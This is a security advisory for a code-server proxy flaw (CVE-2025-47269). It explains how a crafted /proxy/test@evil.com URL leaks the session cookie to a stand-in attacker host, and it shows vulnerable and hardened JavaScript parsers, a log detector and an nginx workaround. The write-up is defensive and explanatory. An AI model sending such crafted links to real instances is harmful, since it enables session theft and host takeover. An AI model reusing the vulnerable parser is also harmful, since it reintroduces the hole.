PT-2025-20599 · Unknown · Code-Server

Code-Asher

·

Published

2025-05-09

·

Updated

2025-05-12

·

CVE-2025-47269

CVSS v3.1

8.3

High

Vector

AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L
Name of the Vulnerable Software and Affected Versions

code-server versions prior to 4.99.4
Description

code-server's built-in proxy forwards requests made under the /proxy subpath. Because the target segment of that subpath is not properly validated in affected versions, a maliciously crafted URL can make the proxy connect to an arbitrary domain instead of the intended target, exposing the user's session token. For example, https://<code-server>/proxy/test@evil.com/path is proxied to test@evil.com/path, where an attacker who controls evil.com can capture the session cookie sent along with the request. With that cookie, the attacker can log in to code-server and obtain full access to the machine hosting code-server as the user running it.
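The following is an added example for this entry and is not code-server's own code. It shows why a path segment such as test@evil.com becomes an off-host proxy target once it is spliced into a URL, the check that rejects it (accepting only a bare port number), and a scan over access-log lines for requests of that shape. The URL template in the vulnerable function, all function names and the sample log lines are assumptions constructed for illustration.

```javascript
// Added example for this advisory entry; it is not code-server's own code.
// The URL template, function names and log lines are assumptions
// constructed for illustration.

// Vulnerable pattern (assumed shape, not the project's code): the first
// segment after /proxy/ is spliced into "http://0.0.0.0:<segment>". For
// "test@evil.com" the WHATWG URL parser reads "0.0.0.0:test" as userinfo
// and "evil.com" as the host, so the proxied request leaves the machine.
// A proxy that forwards the inbound Cookie header then hands the session
// token to evil.com.
function resolveProxyTargetVulnerable(requestPath) {
  const m = /^\/proxy\/([^/]+)(\/.*)?$/.exec(requestPath);
  if (!m) return null;
  try {
    const url = new URL(`http://0.0.0.0:${m[1]}${m[2] || "/"}`);
    return { hostname: url.hostname, port: url.port, path: url.pathname };
  } catch {
    return null; // e.g. "http://0.0.0.0:evil.com/" is not a valid URL
  }
}

// Hardened pattern: the proxy only exists to reach ports on the code-server
// host, so the segment must be a bare TCP port. Nothing else is ever used
// to build a URL, and the host is fixed to the loopback address.
function resolveProxyTargetHardened(requestPath) {
  const m = /^\/proxy\/(\d{1,5})(\/.*)?$/.exec(requestPath);
  if (!m) return null;
  const port = Number(m[1]);
  if (port < 1 || port > 65535) return null;
  return { hostname: "127.0.0.1", port, path: m[2] || "/" };
}

// Detection: return access-log lines whose /proxy/ segment is not a port.
// Matches the request line of common/combined-format logs.
function findSuspiciousProxyRequests(logLines) {
  const reqLine = /"(?:GET|POST|PUT|PATCH|DELETE|HEAD|OPTIONS) (\/proxy\/[^ "]*)/;
  return logLines.filter((line) => {
    const m = reqLine.exec(line);
    return m !== null && resolveProxyTargetHardened(m[1]) === null;
  });
}

// Constructed sample log lines (not from any real deployment).
const SAMPLE_LOG = [
  '10.0.0.5 - - [09/May/2025:12:00:01 +0000] "GET /proxy/8080/ HTTP/1.1" 200 512',
  '10.0.0.5 - - [09/May/2025:12:00:07 +0000] "GET /proxy/test@evil.com/path HTTP/1.1" 302 0',
  '10.0.0.9 - - [09/May/2025:12:01:15 +0000] "GET /login HTTP/1.1" 200 1024',
];

console.log(resolveProxyTargetVulnerable("/proxy/test@evil.com/path"));
// -> { hostname: 'evil.com', port: '', path: '/path' }
console.log(resolveProxyTargetHardened("/proxy/test@evil.com/path")); // -> null
console.log(findSuspiciousProxyRequests(SAMPLE_LOG).length); // -> 1
```

The hardened parser deliberately validates before parsing: a port is a short digit string, so there is no reason to let a general-purpose URL parser see attacker-controlled characters such as @ at all. The same numeric check doubles as a detection rule over existing logs.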
Recommendations

Update to code-server 4.99.4 or later, which resolves the issue. If updating is not immediately possible, disable the built-in proxy, or restrict access to the /proxy subpath (for example at a reverse proxy in front of code-server) so that only legitimate targets are reachable. Because exploitation requires the victim to open a crafted link (UI:R in the vector), users should also avoid following untrusted links that point at the /proxy subpath of a code-server instance.
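One way to apply the "restrict access to the proxy subpath" workaround, as an added example that is not part of the advisory or of the code-server project. It assumes nginx terminates TLS in front of code-server listening on 127.0.0.1:8080; the hostname and certificate paths are placeholders.

```nginx
# Added example, not from the advisory or the code-server project.
# Assumes nginx in front of code-server on 127.0.0.1:8080; hostname and
# certificate paths are placeholders.
server {
    listen 443 ssl;
    server_name code.example.internal;
    ssl_certificate     /etc/nginx/tls/code.crt;
    ssl_certificate_key /etc/nginx/tls/code.key;

    # Only a bare port number is a legitimate proxy target. A matching regex
    # location wins over the plain /proxy/ prefix location below.
    location ~ ^/proxy/[0-9]{1,5}(/|$) {
        proxy_pass http://127.0.0.1:8080;
        proxy_set_header Host $host;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection upgrade;
    }

    # Anything else under /proxy/ (including test@evil.com, also when the
    # @ is sent as %40, since nginx decodes the URI before matching) is refused.
    location /proxy/ {
        return 403;
    }

    location / {
        proxy_pass http://127.0.0.1:8080;
        proxy_set_header Host $host;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection upgrade;
    }
}
```

This limits exposure at the edge but does not fix the parsing in code-server itself; it is a stopgap until the instance is updated to 4.99.4.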


Weakness Enumeration

Related Identifiers

CVE-2025-47269
GHSA-P483-WPFP-42CJ

Affected Products

Code-Server